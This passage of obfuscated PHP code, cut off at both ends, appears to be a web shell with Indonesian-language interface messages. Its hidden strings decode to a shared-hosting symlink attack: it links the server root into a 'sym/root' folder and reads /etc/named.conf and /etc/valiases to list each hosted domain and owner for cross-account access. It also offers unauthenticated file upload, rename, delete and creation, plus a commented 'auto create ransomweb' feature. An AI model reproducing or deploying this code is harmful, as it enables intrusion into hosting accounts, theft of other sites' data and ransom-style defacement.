"\x3c\143\x65\x6e\164\x65\x72\x3e\xa\x9\x9\11\11\x3c\142\x72\57\76\12\11\x9\x9\x9\x3c\x66\x6f\x6e\164\x20\x63\157\x6c\x6f\162\75\x27\162\145\144\47\76\x47\x61\x67\x61\154\40\x4d\145\x6d\142\x61\x63\141\40\x2f\x65\164\x63\57\x6e\x61\x6d\x65\144\56\x63\x6f\x6e\x66\x3c\57\x66\157\156\164\76\xa\11\x9\11\x9\74\142\162\57\x3e\x3c\x62\162\x2f\76\x3c\57\x63\x65\156\x74\x65\162\76"; } else { echo "\x3c\143\x65\x6e\164\x65\x72\x3e\12\11\11\11\x3c\x64\151\166\40\143\154\x61\x73\x73\x3d\x27\x74\155\160\47\76\74\x2f\x63\145\156\x74\145\x72\x3e\12\11\x9\x9\11\x3c\164\x61\142\x6c\x65\40\141\154\x69\147\x6e\x3d\47\143\x65\156\164\145\x72\47\40\167\151\x64\x74\x68\75\47\61\60\x30\x25\x27\x3e\xa\11\x9\11\x9\11\74\x74\x68\145\141\x64\x20\143\154\141\163\163\x3d\47\x62\147\x2d\x69\156\x66\x6f\x27\x3e\12\11\x9\11\x9\11\11\x3c\164\x68\x3e\x44\157\x6d\141\x69\x6e\163\x3c\57\164\150\76\12\x9\11\x9\x9\11\11\74\164\x68\x3e\x55\x73\145\x72\x73\x3c\57\164\150\76\xa\11\x9\11\11\11\x9\74\x74\150\76\163\171\155\154\x69\x6e\153\40\x3c\57\x74\150\76\12\x9\11\11\11\11\x3c\x2f\164\150\145\x61\x64\x3e"; foreach ($d00m as $dom) { if (eregi("\x7a\x6f\x6e\145", $dom)) { preg_match_all("\43\x7a\157\156\145\40\42\x28\56\52\x29\42\43", $dom, $domsws); flush(); if (strlen(trim($domsws[1][0])) > 2) { $user = posix_getpwuid(@fileowner("\x2f\145\x74\143\57\166\x61\154\x69\x61\163\x65\163\x2f" . $domsws[1][0])); flush(); $site = $user["\x6e\141\x6d\x65"]; @symlink("\x2f", "\x73\x79\x6d\x2f\x72\x6f\157\x74"); $site = $domsws[1][0]; $ir = "\151\x72"; $il = "\x69\154"; if (preg_match("\x2f\56\x5e{$ir}\x2f", $domsws[1][0]) or preg_match("\x2f\x2e\x5e{$il}\x2f", $domsws[1][0])) { $site = "\56{$domsws["\61"]}\x5b\60\135\56"; } echo "\xa\11\x9\x9\11\x9\x9\x9\11\x3c\164\162\76\12\11\11\x9\x9\11\11\11\x9\x9\74\164\x64\x3e\xa\11\11\x9\11\11\x9\11\11\11\11\74\141\x20\x74\x61\162\x67\x65\164\75\47\x5f\142\154\x61\156\153\x27\x20\150\162\x65\146\75\150\x74\164\160\72\57\57\167\167\x77\x2e" . $domsws[1][0] . "\x2f\x3e" . $site . "\x20\x3c\x2f\141\76\xa\x9\x9\11\x9\11\x9\11\11\x9\x3c\x2f\x74\144\76\xa\x9\x9\x9\x9\11\x9\11\11\11\x3c\x74\144\x3e\12\11\x9\x9\x9\11\11\11\11\11\x9" . $user["\x6e\141\x6d\145"] . "\12\11\11\11\11\11\11\x9\11\11\74\x2f\x74\144\x3e\xa\x9\11\x9\11\11\x9\x9\x9\x9\74\x74\144\x3e\xa\x9\11\11\x9\x9\x9\11\11\x9\x9\x3c\x61\40\150\162\x65\146\x3d\x27\163\171\x6d\57\x72\157\157\x74\x2f\x68\x6f\x6d\145\57" . $user["\156\141\155\145"] . "\57\x70\165\x62\154\151\143\137\150\164\155\x6c\47\40\164\141\162\x67\145\x74\x3d\x27\137\x62\x6c\141\x6e\x6b\47\x3e\x53\x79\155\154\151\156\x6b\74\x2f\141\76\xa\x9\11\11\x9\x9\11\x9\x9\11\x3c\57\164\144\x3e\xa\x9\x9\11\11\x9\x9\11\x9\74\57\164\162\76"; flush(); flush(); } } } echo "\x3c\x2f\x74\x61\x62\x6c\x65\x3e\xa\11\11\x9\x3c\57\x64\151\166\76\74\x62\162\x3e\x3c\142\x72\76"; } } goto WwQku; o2Prn: if ($_POST["\157\160\164"] == "\162\x65\x6e\x61\155\145") { if (isset($_POST["\156\145\167\156\x61\155\x65"])) { if (rename($_POST["\160\x61\x74\150"], $path . "\x2f" . $_POST["\x6e\145\x77\x6e\x61\x6d\145"])) { echo "\x3c\x73\143\x72\x69\x70\x74\76\167\151\x6e\144\157\167\x2e\x6c\157\143\x61\x74\151\157\x6e\x3d\47\77\160\x61\x74\x68\75" . $path . "\47\73\x20\163\x77\141\154\50\x27\x42\145\162\150\141\x73\x69\154\40\115\145\x72\x65\156\x61\155\x65\x20\x46\151\x6c\145\x21\x21\x21\x27\x2c\40\x27\123\x65\154\x61\155\141\x74\x20\101\156\x64\x61\x20\102\x65\162\150\141\163\x69\x6c\x20\115\x65\x72\x65\156\x61\155\x65\x20\x46\151\x6c\145\x27\54\x20\x27\x73\165\x63\x63\x65\163\163\47\x29\x3b\x3c\x2f\x73\x63\162\151\160\x74\76"; } else { echo "\x3c\x73\143\162\x69\160\x74\76\x77\x69\156\x64\157\167\x2e\x6c\157\143\141\x74\x69\157\156\x3d\x27\77\x70\x61\x74\x68\x3d" . $path . "\47\x3b\x20\163\167\141\x6c\50\47\107\141\147\141\154\40\115\145\162\145\x6e\x61\x6d\x65\40\106\x69\x6c\145\41\41\41\47\x2c\40\x27\x41\x6e\144\x61\40\107\x61\x67\141\154\x20\115\145\162\145\x6e\x61\x6d\x65\163\x20\x46\x69\x6c\145\x27\54\x20\x27\145\x72\162\x6f\x72\x27\51\x3b\x3c\x2f\x73\143\162\151\x70\x74\x3e"; } $_POST["\156\141\155\x65"] = $_POST["\156\145\167\x6e\141\x6d\x65"]; } echo "\x3c\146\x6f\162\x6d\x20\x6d\145\x74\150\x6f\x64\x3d\x22\120\x4f\x53\x54\42\x3e\xa\40\x20\x20\x20\40\40\x20\x20\40\x20\40\40\x20\40\x20\x20\40\40\x20\40\x3c\144\x69\x76\40\x63\154\x61\163\163\75\42\x63\x6f\156\164\141\x69\156\x65\162\55\146\x6c\165\x69\144\x3e\12\40\x20\40\x20\40\40\x20\x20\40\40\40\40\40\40\40\x20\x20\40\40\x20\74\144\x69\x76\40\x63\154\x61\163\x73\75\x22\155\x62\x2d\x33\x22\76\xa\40\x20\x20\x20\40\x20\x20\40\40\40\x20\40\40\x20\x20\40\40\x20\x20\40\x3c\154\141\142\x65\154\x20\x66\157\162\75\x22\145\170\x61\x6d\x70\x6c\145\x46\157\x72\x6d\103\157\156\164\162\x6f\x6c\x49\156\160\x75\164\61\x22\40\x63\154\141\163\163\75\42\x66\x6f\x72\155\55\x6c\x61\x62\145\154\42\76\116\141\155\145\x20\x46\x69\154\145\x2f\x44\x69\x72\145\143\164\157\x72\x79\74\57\x6c\x61\x62\x65\154\x3e\12\40\40\x20\x20\x20\40\x20\x20\x20\40\40\40\40\x20\x20\40\x20\40\40\x20\x3c\151\x6e\x70\x75\x74\x20\x6e\141\155\145\x3d\x22\x6e\145\x77\x6e\141\x6d\145\42\x20\164\171\x70\145\75\x22\x74\145\x78\x74\42\40\143\x6c\141\163\x73\x3d\x22\x66\x6f\162\155\55\143\157\156\164\162\157\154\x22\x20\151\x64\x3d\42\x65\x78\x61\x6d\160\x6c\145\106\x6f\x72\x6d\x43\157\x6e\164\162\157\x6c\x49\x6e\160\x75\x74\61\42\40\x76\x61\154\165\x65\x3d\x22" . $_POST["\x6e\x61\155\x65"] . "\42\40\x70\154\141\143\x65\150\157\154\144\145\x72\75\42\116\145\x77\40\116\x61\x6d\x65\x22\x3e\12\40\x20\x20\40\x20\40\40\40\x20\40\x20\40\40\x20\40\x20\40\x20\74\57\144\x69\x76\x3e\xa\40\40\40\x20\40\x20\x20\40\40\40\40\x20\x20\x20\x20\40\74\x69\x6e\x70\x75\164\40\x74\x79\x70\145\75\42\150\151\144\x64\145\156\x22\40\x6e\x61\155\x65\x3d\42\x70\x61\164\x68\42\x20\x76\x61\x6c\165\x65\x3d\42" . $_POST["\x70\141\x74\x68\x6e\x79\x61"] . "\x22\x3e\xa\x20\40\40\x20\x20\x20\x20\x20\40\40\x20\x20\40\x20\40\40\74\151\156\x70\x75\x74\x20\164\171\160\145\x3d\x22\x68\151\144\x64\145\x6e\x22\40\156\141\155\145\x3d\42\x6e\141\x6d\145\x22\40\166\141\154\x75\x65\x3d\42" . $lihat . "\x22\x3e\xa\40\x20\40\x20\40\x20\x20\x20\x20\40\40\x20\40\x20\x20\40\x3c\151\156\160\165\x74\40\x74\171\x70\x65\x3d\42\x68\151\x64\144\x65\156\42\x20\156\141\x6d\x65\x3d\x22\x6f\x70\x74\42\40\x76\141\x6c\x75\145\75\x22\162\145\x6e\141\155\x65\42\76\12\x20\40\x20\x20\x20\x20\x20\x20\x20\40\x20\40\x20\40\x20\x20\x3c\x62\162\76\74\x62\162\76\xa\40\40\40\40\x20\x20\x20\40\40\x20\40\40\x20\40\x20\40\x3c\151\156\160\x75\x74\x20\164\x79\x70\x65\x3d\x22\163\165\142\155\151\x74\x22\x20\166\x61\154\165\145\75\x22\122\x65\x6e\x61\x6d\x65\40\x4e\157\x77\42\40\x63\154\141\x73\163\x3d\42\164\x6f\x6d\142\x6f\x6c\x20\142\x74\156\x20\142\164\156\x2d\x6f\x75\164\154\x69\x6e\x65\x2d\163\145\143\x6f\x6e\144\141\162\x79\x20\142\x74\x6e\55\x62\154\x6f\143\153\x22\x3e\12\x20\40\40\40\40\40\x20\x20\x20\40\40\x20\x20\x20\x20\x20\74\x2f\144\151\x76\x3e\xa\x20\x20\40\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\40\40\x20\x3c\57\146\157\162\x6d\x3e"; } goto ybyj0; ybyj0: function ($permfile) { $perms = fileperms($file); if (($perms & 49152) == 49152) { $info = "\163"; } elseif (($perms & 40960) == 40960) { $info = "\x6c"; } elseif (($perms & 32768) == 32768) { $info = "\55"; } elseif (($perms & 24576) == 24576) { $info = "\x62"; } elseif (($perms & 16384) == 16384) { $info = "\x64"; } elseif (($perms & 8192) == 8192) { $info = "\x63"; } elseif (($perms & 4096) == 4096) { $info = "\x70"; } else { $info = "\x75"; } $info .= $perms & 256 ? "\x72" : "\x2d"; $info .= $perms & 128 ? "\167" : "\55"; $info .= $perms & 64 ? $perms & 2048 ? "\x73" : "\x78" : ($perms & 2048 ? "\x53" : "\55"); $info .= $perms & 32 ? "\x72" : "\55"; $info .= $perms & 16 ? "\167" : "\55"; $info .= $perms & 8 ? $perms & 1024 ? "\163" : "\170" : ($perms & 1024 ? "\x53" : "\55"); $info .= $perms & 4 ? "\162" : "\x2d"; $info .= $perms & 2 ? "\x77" : "\x2d"; $info .= $perms & 1 ? $perms & 512 ? "\164" : "\x78" : ($perms & 512 ? "\124" : "\x2d"); return $info; }; goto VBFow; RBMdP: if (isset($_GET["\x6f\160\x74\x69\x6f\x6e"]) && $_POST["\157\x70\x74"] == "\144\145\154\145\x74\x65") { if ($_POST["\164\171\160\x65"] === "\144\151\162\145\143\164\157\x72\171") { if (rmdir($_GET["\x70\141\x74\x68\156\171\x61"])) { echo "\x3c\x73\143\162\151\x70\164\76\163\167\x61\154\50\x27\x42\145\162\150\x61\163\x69\x6c\x20\115\x65\x6e\147\x68\x61\x70\165\x73\x20\x46\157\154\x64\145\162\41\41\x21\47\x2c\x20\47\123\145\x6c\x61\155\x61\x74\x20\x41\156\144\141\40\x42\145\162\150\141\x73\151\x6c\40\115\145\156\147\x68\141\x70\165\x73\40\106\157\x6c\x64\145\x72\47\x2c\x20\47\x73\x75\x63\143\x65\x73\163\x27\51\74\57\x73\143\x72\x69\160\x74\76"; } else { echo "\74\163\143\x72\151\160\164\x3e\x73\x77\x61\154\50\x22\x47\x61\x67\x61\x6c\x20\x4d\145\156\147\x68\x61\160\x75\163\40\x46\x6f\x6c\x64\145\x72\x21\x21\x21\x22\x2c\x20\x22\115\141\x61\x66\40\101\x6e\x64\x61\40\x54\151\x64\x61\153\40\x42\151\x73\x61\x20\x4d\145\156\x67\x68\141\160\x75\163\40\106\157\154\x64\145\x72\x22\54\40\42\x65\162\x72\157\162\x22\x29\73\x77\x69\x6e\144\157\167\x2e\x6c\157\143\141\164\x69\157\x6e\x3d\x27\x3f\x70\x61\164\x68\75" . $path . "\x27\x3c\57\163\143\162\151\x70\164\76"; } } else { if ($_POST["\x74\171\160\x65"] == "\x66\x69\154\x65") { if (unlink($_POST["\x70\141\x74\x68\156\x79\141"])) { echo "\x3c\163\143\162\151\160\164\x3e\163\167\x61\154\x28\x27\102\x65\x72\x68\141\163\151\x6c\40\x4d\145\x6e\147\x68\x61\160\x75\x73\40\106\151\x6c\145\41\x21\41\47\54\x20\47\x53\145\154\x61\155\x61\164\40\x41\x6e\144\x61\40\x42\x65\162\150\141\163\x69\x6c\40\x4d\145\156\x67\150\x61\160\x75\163\x20\106\x69\x6c\145\x27\x2c\40\x27\163\x75\143\x63\145\x73\163\x27\51\x3b\40\167\x69\156\144\x6f\x77\x2e\x6c\157\143\x61\164\x69\157\x6e\x3d\47\77\160\x61\164\x68\x3d" . $path . "\x27\73\x3c\x2f\163\x63\162\151\x70\x74\76"; } else { echo "\x3c\163\143\162\x69\160\164\76\x73\x77\141\154\50\42\x47\141\147\x61\154\x20\x4d\x65\x6e\147\x68\x61\x70\x75\163\40\106\151\x6c\x65\x21\41\41\42\54\x20\42\x4d\x61\x61\x66\x20\101\x6e\x64\141\40\x54\151\144\141\x6b\x20\102\151\x73\141\40\115\x65\x6e\x67\150\141\x70\165\163\40\106\151\154\x65\42\x2c\x20\x22\x65\162\x72\x6f\162\x22\51\73\40\167\x69\x6e\x64\157\167\56\x6c\157\143\x61\x74\151\x6f\x6e\75\x27\77\160\x61\164\x68\x3d" . $path . "\47\73\74\57\163\x63\x72\x69\160\x74\x3e"; } } } } goto XgDDu; exsUL: echo "\x3c\160\40\x63\154\x61\163\x73\75\47\x74\165\154\151\163\x61\156\x27\76\40\x50\x41\x54\x48\40\x3a\x20"; goto MQCqU; S_SOe: echo "\xa\40\x20\x20\x20\x20\x20\40\x20\x20\40\x20\x20\74\x66\x6f\x72\x6d\40\155\145\164\150\157\144\x3d\x22\160\157\x73\164\42\x20\145\x6e\143\164\171\160\145\x3d\x22\155\x75\154\164\151\x70\x61\162\x74\x2f\x66\157\x72\155\x2d\144\141\x74\141\x22\76\xa\x20\40\x20\40\40\x20\x20\40\x20\40\x20\40\x20\x20\x20\x20\74\x64\151\166\40\x63\x6c\141\x73\163\x3d\x22\165\160\154\157\x61\x64\x65\162\40\146\x69\x6c\145\x20\x69\156\x70\x75\x74\55\x67\x72\157\165\x70\x20\151\x6e\x70\x75\x74\x2d\x67\162\x6f\165\x70\55\163\155\x20\155\142\55\x33\x20\155\x73\x2d\x61\x75\164\157\x22\76\xa\40\40\x20\x20\40\40\40\x20\x20\x20\40\x20\40\40\x20\x20\40\x20\x20\x20\74\x69\x6e\x70\x75\164\x20\x74\x79\160\145\x3d\42\x66\x69\x6c\x65\x22\x20\x6e\x61\155\145\x3d\x22\x75\x70\154\x22\40\x63\x6c\x61\x73\x73\x3d\x22\x66\157\x72\x6d\x2d\x63\157\156\x74\x72\x6f\154\x22\40\x69\x64\75\42\151\x6e\x70\165\164\107\162\x6f\x75\x70\106\x69\x6c\x65\x30\64\x22\40\141\x72\x69\x61\55\x64\145\x73\143\162\151\x62\145\x64\x62\171\75\42\x69\156\160\x75\164\x47\x72\157\x75\160\106\x69\x6c\x65\101\x64\144\x6f\x6e\x30\x34\42\40\x61\162\x69\x61\55\154\141\142\145\x6c\75\x22\125\160\154\x6f\141\x64\42\x3e\xa\40\40\x20\40\40\x20\x20\x20\x20\x20\x20\x20\40\40\40\x20\40\x20\x20\40\x3c\142\x75\x74\x74\x6f\156\40\x6e\x61\x6d\145\75\x22\142\x74\156\x22\x20\x63\x6c\141\163\163\x3d\x22\x62\164\156\x20\142\x74\156\x2d\x73\x65\143\157\x6e\144\x61\162\x79\42\x20\x74\171\x70\x65\x3d\42\163\x75\x62\155\151\164\42\40\151\144\75\x22\x69\x6e\x70\165\164\x47\x72\157\165\x70\106\151\x6c\x65\101\x64\144\157\156\x30\x34\42\x3e\x55\x70\154\157\x61\x64\x3c\x2f\142\165\164\x74\x6f\156\x3e\xa\x20\40\x20\40\40\x20\x20\40\40\x20\x20\40\40\40\40\40\x3c\x2f\x64\151\166\76\12\x20\40\40\x20\x20\40\40\x20\40\x20\x20\40\x3c\x2f\x66\157\x72\x6d\76\12\xa\40\x20\x20\x20\x20\x20\40\40\x20\x20\x20\40\74\41\55\x2d\40\x74\x61\x6d\142\x61\150\40\146\151\x6c\145\x2f\x66\x6f\x6c\x64\x65\162\40\46\x20\x72\141\156\x73\x6f\x6d\x77\145\x62\x20\x2d\x2d\x3e\12\x20\x20\x20\40\x20\40\x20\x20\x20\40\40\x20\x3c\144\x69\x76\40\x63\x6c\x61\163\x73\x3d\x22\164\x61\155\x62\141\150\42\76\12\x20\40\x20\x20\x20\40\x20\x20\40\40\x20\x20\40\40\x20\x20\x3c\144\151\x76\40\143\154\x61\163\163\75\42\143\157\156\x74\141\151\x6e\x65\162\x2d\x66\154\165\x69\x64\42\x3e\12\40\x20\40\40\40\40\x20\x20\40\40\x20\x20\40\x20\x20\x20\x20\40\40\x20\x3c\x64\151\166\40\x63\x6c\141\x73\163\75\x22\x72\x6f\167\x20\x72\157\x77\x2d\x63\x6f\x6c\x73\x2d\141\x75\x74\x6f\x22\76\xa\x20\40\x20\x20\x20\x20\40\40\40\x20\40\x20\40\x20\40\x20\x20\x20\40\40\40\x20\40\40\x3c\41\x2d\x2d\40\146\x75\156\x67\x73\x69\40\164\x61\155\x62\x61\150\40\146\x69\x6c\145\40\x2d\x2d\76\12\40\x20\40\x20\40\40\40\x20\40\40\x20\40\40\x20\40\40\40\x20\40\40\40\x20\40\x20\x3c\x64\x69\x76\40\x63\154\141\x73\163\75\42\143\157\x6c\55\64\42\76\12\x20\x20\40\x20\40\x20\40\x20\40\40\40\x20\40\40\x20\40\x20\x20\40\x20\x20\x20\x20\x20\40\x20\x20\x20\x3c\x73\166\147\40\x63\x6c\x61\163\x73\x3d\x22\x69\143\x6f\x6e\42\x20\x78\x6d\154\156\163\x3d\42\150\164\164\160\x3a\x2f\57\167\167\x77\x2e\167\x33\56\x6f\162\147\57\62\x30\x30\x30\x2f\163\x76\x67\42\x20\167\x69\144\x74\150\75\42\x32\66\x22\40\150\x65\151\147\x68\x74\75\42\x32\66\x22\12\40\40\40\x20\x20\40\40\x20\40\40\x20\40\40\x20\x20\x20\40\40\40\40\x20\x20\x20\x20\40\x20\x20\40\x20\x20\40\40\x66\151\154\154\75\x22\x63\165\x72\162\x65\156\x74\103\157\x6c\157\x72\x22\40\x63\154\x61\163\x73\x3d\x22\x62\x69\x20\142\x69\x2d\x66\151\154\145\x2d\145\x61\x72\155\141\162\153\x2d\x70\x6c\165\163\42\x20\166\x69\145\167\102\157\x78\x3d\42\x30\x20\60\x20\x31\x36\40\61\66\42\x3e\xa\40\x20\40\40\40\40\x20\40\40\x20\x20\40\x20\40\x20\x20\x20\x20\40\x20\x20\x20\x20\x20\x20\x20\x20\40\40\40\x20\x20\74\160\x61\164\150\xa\x20\x20\x20\40\40\x20\x20\40\40\40\x20\x20\40\40\40\40\x20\40\x20\40\x20\x20\40\x20\40\40\x20\40\x20\40\x20\x20\x20\40\x20\40\x64\75\x22\x4d\x38\40\66\x2e\65\141\x2e\x35\56\x35\x20\60\40\x30\40\61\40\x2e\x35\x2e\x35\166\61\56\65\110\x31\x30\141\56\65\x2e\65\x20\x30\x20\60\40\61\40\60\x20\x31\x48\70\x2e\x35\x56\x31\61\141\56\x35\56\65\x20\60\40\60\x20\61\55\61\x20\x30\x56\x39\x2e\x35\110\66\x61\56\x35\56\65\40\60\x20\60\x20\x31\x20\x30\x2d\x31\x68\x31\x2e\65\126\x37\141\x2e\x35\56\65\x20\x30\40\60\x20\61\40\x2e\65\x2d\56\x35\172\x22\40\x2f\x3e\xa\40\x20\40\40\x20\40\x20\40\x20\x20\x20\40\40\40\x20\x20\40\x20\x20\x20\x20\x20\40\x20\x20\40\40\x20\40\40\40\40\74\160\x61\x74\150\xa\40\x20\40\x20\40\40\x20\x20\40\40\40\x20\40\x20\x20\x20\x20\40\40\40\x20\40\x20\x20\x20\40\x20\40\40\40\x20\x20\40\x20\x20\40\x64\75\x22\x4d\x31\x34\x20\64\56\65\x56\61\x34\x61\x32\40\x32\x20\x30\40\x30\40\61\55\x32\40\62\110\64\x61\62\x20\62\x20\60\x20\x30\40\61\55\x32\x2d\62\126\x32\x61\x32\x20\x32\x20\60\40\60\40\x31\x20\62\55\62\x68\x35\x2e\65\114\x31\64\40\64\56\x35\172\155\x2d\x33\40\x30\x41\61\56\x35\x20\61\x2e\65\x20\60\40\x30\x20\61\40\x39\x2e\x35\40\63\x56\x31\x48\x34\141\x31\x20\x31\x20\60\40\x30\40\60\55\61\x20\61\x76\x31\x32\x61\61\x20\x31\40\60\x20\x30\x20\x30\40\x31\40\61\150\70\x61\61\40\61\40\60\x20\x30\x20\x30\40\61\x2d\61\x56\x34\56\x35\x68\x2d\x32\x7a\42\x20\57\76\xa\40\40\40\40\x20\x20\40\x20\x20\40\40\x20\x20\40\x20\40\40\x20\40\40\x20\40\x20\x20\x20\x20\x20\x20\x3c\x2f\x73\166\147\76\12\x20\x20\40\40\x20\x20\40\40\x20\40\x20\40\x20\40\x20\x20\x20\40\40\x20\40\40\40\x20\40\40\40\x20\x3c\141\x20\143\x6c\141\163\163\75\42\x70\141\x74\x68\x22\x20\150\x72\x65\146\x3d\x22\x3f\160\141\164\150\x3d" . $path . "\46\x61\x6b\x73\x69\x3d\142\x75\141\164\146\x69\154\145\x22\76\102\165\x61\164\x20\x46\151\154\x65\74\57\141\76\xa\x20\x20\40\x20\40\x20\40\40\x20\40\40\x20\40\x20\x20\x20\40\x20\x20\40\x20\40\x20\x20\74\x2f\144\151\166\x3e\xa\x20\40\40\x20\x20\40\40\x20\x20\x20\x20\x20\x20\x20\x20\40\x20\x20\40\x20\x20\40\40\40\74\x21\55\x2d\40\141\x6b\x68\x69\x72\40\x66\165\x6e\x67\163\x69\40\164\x61\x6d\142\141\x68\40\x66\x69\154\145\x20\x2d\55\76\xa\12\x20\x20\x20\40\x20\x20\40\40\40\x20\x20\40\x20\40\x20\x20\40\40\x20\x20\x20\40\x20\x20\74\x21\55\x2d\40\146\x75\x6e\147\x73\x69\40\x74\141\155\142\141\150\40\146\157\x6c\x64\x65\162\x20\55\x2d\76\xa\x20\40\x20\x20\x20\40\40\40\x20\40\40\40\x20\40\40\40\40\x20\x20\40\40\x20\x20\40\x3c\x64\151\166\40\143\154\x61\x73\163\x3d\42\x63\x6f\x6c\x2d\64\x22\76\xa\40\x20\x20\40\40\x20\x20\x20\x20\40\x20\x20\x20\x20\x20\x20\40\40\40\x20\x20\x20\40\x20\40\40\x20\40\x3c\x73\166\147\x20\x63\x6c\141\x73\163\x3d\x22\151\x63\x6f\x6e\42\40\x78\155\154\156\163\75\42\x68\x74\164\x70\72\x2f\x2f\167\x77\x77\56\167\x33\56\x6f\x72\x67\57\62\60\60\x30\57\x73\166\x67\42\40\x77\x69\144\x74\150\75\x22\63\60\42\40\150\145\151\147\x68\164\75\42\x33\x30\x22\12\40\40\40\40\x20\40\40\x20\x20\x20\x20\x20\x20\40\x20\40\40\40\40\x20\x20\40\x20\x20\40\x20\x20\40\x20\40\x20\40\146\151\x6c\154\x3d\42\143\165\x72\162\145\x6e\164\x43\157\x6c\x6f\x72\x22\x20\143\154\x61\163\163\75\42\142\x69\40\x62\151\55\146\157\154\144\x65\x72\x2d\160\x6c\x75\x73\x22\40\166\x69\145\167\102\157\170\75\42\x30\x20\x30\x20\61\x36\40\x31\x36\x22\76\xa\40\x20\x20\40\x20\40\x20\40\40\x20\40\40\x20\x20\x20\x20\40\40\40\x20\40\x20\x20\x20\x20\x20\x20\40\40\40\x20\x20\74\x70\x61\164\x68\12\x20\40\40\x20\x20\x20\x20\x20\x20\40\x20\40\40\x20\40\x20\40\40\40\x20\x20\x20\40\x20\40\x20\40\x20\40\40\40\x20\40\40\40\x20\144\75\42\155\56\x35\x20\63\x20\x2e\60\x34\56\x38\x37\141\x31\56\x39\x39\x20\x31\x2e\x39\x39\40\60\x20\x30\40\x30\x2d\x2e\x33\64\62\40\61\56\63\x31\x31\x6c\56\66\63\x37\x20\67\101\62\x20\62\40\x30\x20\x30\x20\60\40\62\56\70\x32\66\x20\61\x34\110\71\x76\x2d\x31\x48\x32\56\x38\x32\x36\x61\x31\x20\61\40\x30\40\60\40\61\x2d\56\x39\71\x35\55\x2e\x39\61\x6c\x2d\x2e\x36\x33\x37\x2d\67\101\x31\x20\x31\40\60\x20\60\x20\x31\40\62\x2e\x31\71\40\x34\150\61\x31\x2e\66\62\141\x31\40\x31\40\x30\40\x30\x20\61\x20\x2e\x39\x39\x36\40\61\56\60\71\x4c\x31\x34\56\65\x34\40\70\150\61\56\x30\x30\x35\154\56\x32\x35\x36\55\62\56\x38\x31\x39\101\x32\x20\62\40\60\40\x30\40\x30\x20\61\63\x2e\70\61\40\x33\x48\71\56\70\x32\x38\x61\x32\x20\62\40\60\40\60\x20\61\x2d\61\x2e\64\x31\64\55\x2e\x35\x38\66\x6c\x2d\56\70\x32\70\x2d\x2e\70\x32\70\x41\x32\40\62\x20\x30\x20\60\x20\60\40\66\56\x31\67\62\40\61\110\x32\56\65\141\x32\x20\62\40\60\40\60\x20\60\55\62\40\62\x7a\155\x35\x2e\x36\x37\62\x2d\61\x61\x31\x20\61\x20\x30\x20\60\x20\x31\x20\56\67\60\x37\x2e\x32\71\63\114\67\x2e\65\x38\66\x20\x33\110\62\x2e\x31\x39\x63\x2d\x2e\62\x34\40\60\x2d\56\64\67\56\60\x34\x32\x2d\56\66\70\63\x2e\x31\62\x4c\x31\x2e\65\40\62\x2e\x39\70\141\x31\x20\61\40\60\x20\60\x20\61\40\x31\x2d\56\x39\70\x68\x33\56\66\x37\62\172\42\x20\57\x3e\12\x20\40\40\40\40\40\x20\40\x20\40\40\x20\x20\x20\x20\40\40\40\40\40\x20\x20\x20\x20\40\40\40\40\40\40\40\x20\x3c\x70\x61\x74\150\xa\x20\x20\40\x20\40\x20\x20\x20\40\x20\x20\x20\40\40\40\40\x20\x20\x20\40\40\40\x20\x20\40\x20\x20\x20\40\40\x20\40\40\40\40\x20\144\x3d\x22\x4d\x31\x33\56\x35\40\x31\60\141\56\x35\56\65\x20\60\x20\60\x20\61\40\56\x35\x2e\65\126\x31\62\150\61\56\x35\x61\x2e\65\56\x35\40\60\40\61\x20\x31\x20\x30\x20\x31\x48\x31\x34\x76\61\x2e\x35\x61\56\65\56\x35\40\60\40\x31\x20\x31\55\x31\40\60\x56\x31\63\x68\x2d\x31\x2e\65\141\56\x35\56\65\40\60\40\x30\x20\x31\x20\60\55\61\110\61\63\x76\x2d\61\x2e\x35\x61\56\x35\56\65\40\x30\40\x30\x20\x31\x20\x2e\65\55\56\x35\172\x22\x20\57\x3e\xa\40\40\40\40\40\x20\40\x20\40\40\40\40\40\40\x20\40\40\40\40\40\x20\x20\40\40\x20\40\40\40\x3c\57\163\166\x67\x3e\xa\40\40\40\40\x20\x20\x20\x20\x20\x20\40\x20\x20\x20\40\x20\x20\40\x20\40\x20\x20\x20\40\x20\x20\40\x20\x3c\x61\x20\143\x6c\x61\x73\163\75\x22\x70\141\x74\150\x22\x20\x68\x72\x65\x66\75\x22\77\160\141\164\x68\75" . $path . "\x26\x61\153\x73\x69\75\x62\165\141\164\146\157\x6c\144\x65\162\x22\76\x42\x75\141\x74\40\106\x6f\x6c\x64\145\x72\74\57\x61\76\xa\40\x20\40\x20\x20\x20\x20\x20\40\40\x20\40\40\x20\x20\40\x20\40\x20\40\x20\40\40\40\x3c\x2f\144\151\x76\x3e\12\x20\40\x20\x20\x20\40\40\x20\x20\40\40\40\x20\40\40\40\40\x20\x20\40\x20\40\x20\x20\74\x21\x2d\x2d\40\x41\x6b\150\x69\162\40\x66\x75\x6e\147\x73\151\40\x74\141\x6d\142\141\150\x20\x66\157\154\x64\145\x72\40\55\x2d\76\xa\12\40\x20\x20\40\40\40\x20\40\x20\40\40\x20\x20\40\40\40\40\40\x20\40\x20\40\x20\x20\74\41\x2d\x2d\40\x66\x75\x6e\163\147\151\x20\x61\x75\164\157\40\x63\162\x65\x61\164\x65\x20\162\x61\x6e\x73\157\x6d\167\145\x62\x20\55\55\76\12\40\40\x20\x20\40\x20\40\x20\40\x20\x20\40\x20\40\x20\x20\x20\40\40\40\x20\x20\40\x20\74\x64\x69\x76\40\x63\154\141\163\x73\x3d\x22\143\157\154\55\64\x22\x3e\12\x20\40\x20\x20\40\40\40\40\x20\x20\x20\x20\x20\40\40\x20\x20\x20\40\x20\40\x20\40\x20\x20\40\40\40\x3c\x73\x76\147\40\x78\x6d\x6c\x6e\x73\75\x22\150\164\164\x70\72\x2f\x2f\x77\x77\167\56\167\63\x2e\x6f\162\x67\x2f\62\60\60\60\57\x73\x76\147\x22\40\x78\x3d\42\x30\160\x78\x22\x20\171\x3d\x22\60\x70\170\42\xa\x20\40\x20\x20\40\x20\40\x20\x20\x20\x20\40\x20\x20\x20\x20\x20\40\x20\x20\x20\x20\x20\40\40\40\x20\40\x77\151\144\x74\x68\75\42\63\x30\x22\40\x68\145\151\147\x68\x74\x3d\x22\63\x30\x22\12\40\x20\40\40\x20\40\x20\x20\40\40\x20\x20\40\x20\x20\40\x20\x20\x20\40\40\x20\40\40\40\x20\x20\x20\x76\x69\x65\167\102\x6f\170\75\x22\x30\40\x30\x20\x31\x37\62\40\61\67\62\x22\xa\40\x20\x20\40\x20\40\x20\40\40\x20\40\x20\x20\40\x20\x20\40\40\